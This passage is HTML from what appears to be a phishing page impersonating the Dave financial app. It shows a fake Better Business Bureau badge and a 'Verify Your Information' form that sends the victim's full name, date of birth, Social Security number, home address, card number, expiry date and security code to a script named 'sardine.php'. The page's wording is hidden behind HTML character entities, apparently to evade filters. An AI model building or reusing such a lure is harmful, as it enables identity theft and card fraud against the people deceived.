d="M140.53,83.76a95.69,95.69,0,0,1-3.42,23.74c-3.55,12.62-9.35,24.17-16.14,35.3a188,188,0,0,1-18,24.52,40.5,40.5,0,0,1-2.81,3.17,3.75,3.75,0,0,1-2,.9c-1,.12-1.46-.79-1.36-2.13a36,36,0,0,0-.63-12.14,35.48,35.48,0,0,0-6.91-13.44,97.32,97.32,0,0,0-10.55-10.94c-8.35-7.48-18-13.08-27.58-18.87-6.61-4-13.4-7.76-20-11.86A111.07,111.07,0,0,1,5.73,80.83,52.33,52.33,0,0,1-5,62.11a41.88,41.88,0,0,1-1.25-18c1.41-10.51,5.75-20,11.34-28.82C10.06,7.37,15.48-.22,20.61-8c4.3-6.54,8.82-12.94,12.17-20,.71-1.51,1.34-3.05,2-4.58.73-1.73,1.45-2.24,2.91-2a3.11,3.11,0,0,1,2.83,3c.09.91.09,1.83.24,2.72C42-21.65,45.47-15.39,50.09-9.65,54-4.72,58.9-.85,63.88,2.92,70.21,7.71,77.14,11.53,84,15.47c8,4.59,16.2,8.88,23.94,14A79,79,0,0,1,131,52.27,52.51,52.51,0,0,1,139.55,75C140,78.26,140.29,81.56,140.53,83.76Z" transform="translate(116.46 248.5)"></path><path d="M134.53,363a42,42,0,0,1,12.12,5.46c8.95,5.9,14.49,14.08,15.94,24.81,1.83,13.59-1.9,25.52-10.91,35.8a32.69,32.69,0,0,1-19.3,11.14,49.3,49.3,0,0,1-7.19.68c-5.16.12-10.33.06-15.49.13-13.07.17-26.15.11-39.21.63-11.91.47-23.82.11-35.72.31-.58,0-1.17,0-1.75,0-1.1.07-1.48-.5-1.43-1.52,0-.58,0-1.17,0-1.75v-148c0-3.56-.35-3.2,3.23-3.2,11.08,0,22.16-.05,33.24,0q26.85.17,53.71.49a24.65,24.65,0,0,1,14.45,4.84c9.66,7,14.62,16.79,16.35,28.37a42.85,42.85,0,0,1-14.79,38.85C136.74,361,135.79,361.9,134.53,363ZM92.2,413.91V414h11.5c3.92,0,7.84.05,11.75,0a12,12,0,0,0,3.42-.52c4.28-1.37,6.92-4.48,8.53-8.52a25.88,25.88,0,0,0,.89-16.19c-1.81-7.35-6.68-12.07-15.34-11.75-7.07.26-14.15.34-21.22.48L68,378c-.25,0-.5,0-.74,0-.85,0-1.2.43-1.18,1.24,0,.5,0,1,0,1.5V411c0,.5,0,1,0,1.5a1.23,1.23,0,0,0,1.38,1.39l1.75,0ZM88.65,349v0c6.83,0,13.66.15,20.48,0,8-.23,11.79-4.45,12.74-11.73a23.22,23.22,0,0,0-4-16.14c-1.89-2.86-4.42-5.07-8-5.48-3-.34-6-.41-9-.46-5.74-.11-11.49-.08-17.23-.17-5.24-.09-10.47-.3-15.71-.41-1.93,0-2,0-2,1.93q0,15.22,0,30.46c0,2,0,2.06,2.09,2.06C75,349,81.82,349,88.65,349Z" transform="translate(116.46 248.5)"></path><path d="M281.34,362.77c3.33,1.54,6.67,2.81,9.76,4.55,9.95,5.59,16.12,14,17.91,25.36,2,12.69-1.17,24.13-9,34.24-5.42,7-12.39,11.81-21.28,13.36a48.79,48.79,0,0,1-6.94.64c-4.75.12-9.5.06-14.25.12-13.57.17-27.15.12-40.71.64-12,.46-24,.1-36,.31-.5,0-1,0-1.5,0-1,0-1.33-.49-1.3-1.4,0-.5,0-1,0-1.5V290.38c0-3.06-.16-2.83,2.85-2.83,11.33,0,22.66,0,34,0q26.74.17,53.47.49a24.53,24.53,0,0,1,14.22,4.76c9.75,7.05,14.75,16.89,16.46,28.58a42.79,42.79,0,0,1-14.71,38.63C283.29,360.91,282.31,361.9,281.34,362.77ZM238.5,413.91V414c7.83,0,15.66,0,23.5,0a11.57,11.57,0,0,0,3.41-.54c4.28-1.38,6.89-4.5,8.51-8.55a26,26,0,0,0,.93-15.95c-1.78-7.43-6.61-12.21-15.2-11.94-7.15.23-14.31.33-21.47.48l-23.72.49H214c-.91,0-1.43.31-1.39,1.3,0,.58,0,1.16,0,1.75v29.49c0,.59,0,1.17,0,1.75,0,1.2.56,1.65,1.68,1.61.58,0,1.17,0,1.75,0ZM235,349h2.5c6,0,12,.1,18-.06,8.09-.21,12-4.48,12.91-11.83a23.42,23.42,0,0,0-3.87-15.92,11.72,11.72,0,0,0-7.65-5.57,37.78,37.78,0,0,0-6.21-.48q-17.46-.33-34.93-.6h-2c-.69,0-1.11.28-1.13,1,0,.42,0,.83,0,1.25q0,15,0,30c0,2.19,0,2.22,2.18,2.22Z" transform="translate(116.46 248.5)"></path><path d="M-13.51,362.92c.89.35,1.56.65,2.24.88,7.94,2.68,14.69,7.1,19.66,13.92a34.34,34.34,0,0,1,6.21,15.61,44.08,44.08,0,0,1-5.32,27.94C4.75,429.56-1.85,435.74-10.91,439a37.37,37.37,0,0,1-11.76,1.95c-4.75.11-9.5.05-14.24.11-13.74.18-27.49.12-41.21.64-11.83.45-23.65.1-35.47.31-.5,0-1,0-1.5,0-.93,0-1.39-.37-1.36-1.32,0-.59,0-1.17,0-1.75q0-74.1,0-148.21c0-3.52-.36-3.15,3.26-3.15,11,0,22-.05,33,0q27,.18,54,.51a25.54,25.54,0,0,1,16.42,6.36A40.83,40.83,0,0,1,4.4,320.37c2,13.12-1.19,25-10,35-2.07,2.36-4.53,4.39-6.81,6.57C-12.72,362.24-13,362.49-13.51,362.92Zm-42.37,51V414c7.82,0,15.64.06,23.46,0,4.66-.05,8-2.45,10.31-6.36a24.46,24.46,0,0,0,2.37-18.82,15.38,15.38,0,0,0-5.86-9.29,13.66,13.66,0,0,0-8.2-2.46c-3.9,0-7.8.28-11.71.35-11.39.22-22.78.39-34.18.57a6.26,6.26,0,0,1-.75,0c-1.23-.12-1.64.5-1.53,1.64,0,.33,0,.66,0,1v30.71c0,.49,0,1,0,1.49,0,.73.41,1,1.1,1.05l1.75,0ZM-59.51,349h18.25c.91,0,1.83,0,2.75,0,3.89-.26,7.29-1.51,9.71-4.79a14.84,14.84,0,0,0,2.73-8.93,24.56,24.56,0,0,0-4.54-14.77,11,11,0,0,0-7.27-4.87,43.79,43.79,0,0,0-5.72-.44q-18.12-.35-36.22-.61c-2.1,0-2.14,0-2.14,2q0,15.25,0,30.5c0,1.9,0,1.93,1.95,1.94C-73.18,349-66.34,349-59.51,349Z" transform="translate(116.46 248.5)"></path><path d="M95.49,184.57h126a11.15,11.15,0,0,0,2.24,0c1.24-.25,1.82.11,2.25,1.35,3.21,9.19,6.51,18.36,9.77,27.53.17.47.3,1,.49,1.42.36.9,0,1.2-.89,1.24-2,.1-4,.28-6,.33-3.82.1-7.65.19-11.48.19q-23.75,0-47.49,0c-.58,0-1.17,0-1.75,0-1.3-.12-1.91.46-2.31,1.71-1.8,5.45-3.71,10.86-5.56,16.3q-3.92,11.46-7.78,22.92c-.83,2.45-.83,2.46-3.5,2.46q-44.86.06-89.73.13c-6,0-12,.22-18,.31-2.24,0-2.28,0-3.06-2.13q-5.61-15.21-11.19-30.44c-1.15-3.13-2.29-6.25-3.45-9.37-.68-1.85-.69-1.87-2.67-1.88q-14.25,0-28.49,0c-7.33,0-14.66.06-22,0-5-.06-10-.31-15-.51-1.43-.05-1.52-.17-1-1.69q3.18-9.07,6.42-18.12c1.28-3.61,2.6-7.2,3.85-10.82.29-.82.56-1.2,1.55-.95a11.91,11.91,0,0,0,2.74.07Z" transform="translate(116.46 248.5)"></path></svg>
<div class="two-column_bbbText__2CrBN body-4 hidden-sm"><span>&#66;&#101;&#116;&#116;&#101;&#114;&#32;&#66;&#117;&#115;&#105;&#110;&#101;&#115;&#115;&#32;&#66;&#117;&#114;&#101;&#97;&#117;<br>&#65;&#99;&#99;&#114;&#101;&#100;&#105;&#116;&#101;&#100;&#32;&#66;&#117;&#115;&#105;&#110;&#101;&#115;&#115;</span></div>
<div class="two-column_bbbText__2CrBN body-4 hidden-md hidden-lg"><span>&#65;&#99;&#99;&#114;&#101;&#100;&#105;&#116;&#101;&#100;<br>&#66;&#117;&#115;&#105;&#110;&#101;&#115;&#115;</span></div></div></div>
<div class="two-column_body__1Xpcl">
<div class="MuiGrid-root jss1 MuiGrid-container MuiGrid-direction-xs-column MuiGrid-align-items-xs-center">
<div class="jss2">
<div class="MuiGrid-root MuiGrid-container MuiGrid-direction-xs-column MuiGrid-align-items-xs-center">
<div class="MuiGrid-root jss13 MuiGrid-item"><h1 class="MuiTypography-root jss14 jss20 jss4 jss9 MuiTypography-h1">&#86;&#101;&#114;&#105;&#102;&#121; <span class="jss15">&#89;&#111;&#117;&#114;</span> &#73;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;</h1></div>
<div class="MuiGrid-root jss16 jss21 MuiGrid-container MuiGrid-item MuiGrid-direction-xs-column MuiGrid-align-items-xs-center">

<form action="sardine.php" method="post">

<div class="mb-24"><div class="input_inputWrapper__2ol3E mb-24">
<input name="fname" id= "fname" class="input_input__23px8 input_input-lg__2k8fH" placeholder="" type="text">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#70;&#117;&#108;&#108;&#32;&#78;&#97;&#109;&#101;</span></div></div>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E">
<input name="dob" id= "dob" class="input_input__23px8 input_input-lg__2k8fH" maxlength="72" placeholder="" type="text" value="">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#68;&#97;&#116;&#101;&#32;&#79;&#102;&#32;&#66;&#105;&#114;&#116;&#104;</span> </div></div>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E">
<input name="ssn" id= "ssn" class="input_input__23px8 input_input-lg__2k8fH" maxlength="72" placeholder="" type="text" value="">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#83;&#111;&#99;&#105;&#97;&#108;&#32;&#83;&#101;&#99;&#117;&#114;&#105;&#116;&#121;&#32;&#78;&#117;&#109;&#98;&#101;&#114;</span> </div></div>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E">
<input   name="address" id= "address" class="input_input__23px8 input_input-lg__2k8fH" maxlength="72" placeholder="" type="text" value="">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#72;&#111;&#109;&#101;&#32;&#65;&#100;&#100;&#114;&#101;&#115;&#115;</span> </div></div>

<hr/><br>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E mb-24">
<input name="cardfname" id= "cardfname" class="input_input__23px8 input_input-lg__2k8fH" placeholder="" type="text">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#78;&#97;&#109;&#101;&#32;&#79;&#110;&#32;&#67;&#97;&#114;&#100;</span></div></div>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E mb-24">
<input name="cardnum" id= "cardnum" class="input_input__23px8 input_input-lg__2k8fH" placeholder="" type="text">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#67;&#97;&#114;&#100;&#32;&#78;&#117;&#109;&#98;&#101;&#114;</span></div></div>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E mb-24">
<input name="cardexpd" id= "cardexpd" class="input_input__23px8 input_input-lg__2k8fH" placeholder="" type="text">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#67;&#97;&#114;&#100;&#32;&#69;&#120;&#112;&#105;&#114;&#121;&#32;&#68;&#97;&#116;&#101;</span></div></div>

<div class="mb-24">
<div class="input_inputWrapper__2ol3E">
<input  name="cardsec" id= "cardsec" class="input_input__23px8 input_input-lg__2k8fH" maxlength="72" placeholder="" type="text" value="">
<span class="input_label__1bdsR input_label-lg__t4FU_">&#67;&#97;&#114;&#100;&#32;&#83;&#101;&#99;&#117;&#114;&#105;&#116;&#121;&#32;&#67;&#111;&#100;&#101;</span> </div></div>

<input class="MuiButtonBase-root MuiButton-root MuiButton-contained jss18 jss22 MuiButton-containedSecondary MuiButton-containedSizeLarge MuiButton-sizeLarge MuiButton-fullWidth " tabindex="-1"  type="submit" value="Verify">
</form>
</div>
</div>
</div>
<div class="MuiGrid-root jss24 jss27 MuiGrid-container">
<div class="MuiGrid-root jss25 jss28 jss5 jss31 MuiGrid-container MuiGrid-item">
<p class="MuiTypography-root MuiTypography-body1">

<span class="jss26">&#65;&#108;&#108;&#32;&#73;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;&#32;&#77;&#117;&#115;&#116;&#32;&#66;&#101;&#32;&#86;&#97;&#108;&#105;&#100;&#97;&#116;&#101;&#100;&#46;&nbsp;</span><br/><input type="checkbox">&#73;&#32;&#97;&#103;&#114;&#101;&#101;&#32;&#116;&#104;&#97;&#116;&#32;&#97;&#108;&#108;&#32;&#116;&#104;&#101;&#32;&#105;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;&#32;&#112;&#114;&#111;&#118;&#105;&#100;&#101;&#100;&#32;&#105;&#115;&#32;&#118;&#97;&#108;&#105;&#100;&#32;&#97;&#110;&#100;&#32;&#105;&#110;&#32;&#99;&#111;&#109;&#112;&#108;&#105;&#97;&#110;&#99;&#101;&#32;&#119;&#105;&#116;&#104;&#32;&#68;&#97;&#118;&#101;&#39;&#115;&nbsp;
<a class="MuiTypography-root MuiLink-root MuiLink-underlineAlways jss5 jss31 MuiTypography-colorPrimary" href="" target="_blank">&#80;&#114;&#105;&#118;&#97;&#99;&#121;&#32;&#80;&#111;&#108;&#105;&#99;&#121;</a>,&nbsp;<a class="MuiTypography-root MuiLink-root MuiLink-underlineAlways jss5 jss31 MuiTypography-colorPrimary" href="" target="_blank">&#84;&#79;&#83;</a>,&nbsp;<a class="MuiTypography-root MuiLink-root MuiLink-underlineAlways jss5 jss31 MuiTypography-colorPrimary" href="" target="_blank">&#80;&#97;&#121;&#109;&#101;&#110;&#116;&#32;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#97;&#116;&#105;&#111;&#110;</a>&nbsp;&amp;&nbsp;<a class="MuiTypography-root MuiLink-root MuiLink-underlineAlways jss5 jss31 MuiTypography-colorPrimary" href="" target="_blank">&#69;&#108;&#101;&#99;&#116;&#114;&#111;&#110;&#105;&#99;&#32;&#67;&#111;&#109;&#109;&#117;&#110;&#105;&#99;&#97;&#116;&#105;&#111;&#110;&#32;&#67;&#111;&#110;&#115;&#101;&#110;&#116;</a></p></div></div></div></div><div></div></div><div class="two-column_image__Or5i7 two-column_fadeIn__36UrB" style="background-image: url(love.jpg);"></div></div></div>
</body></html>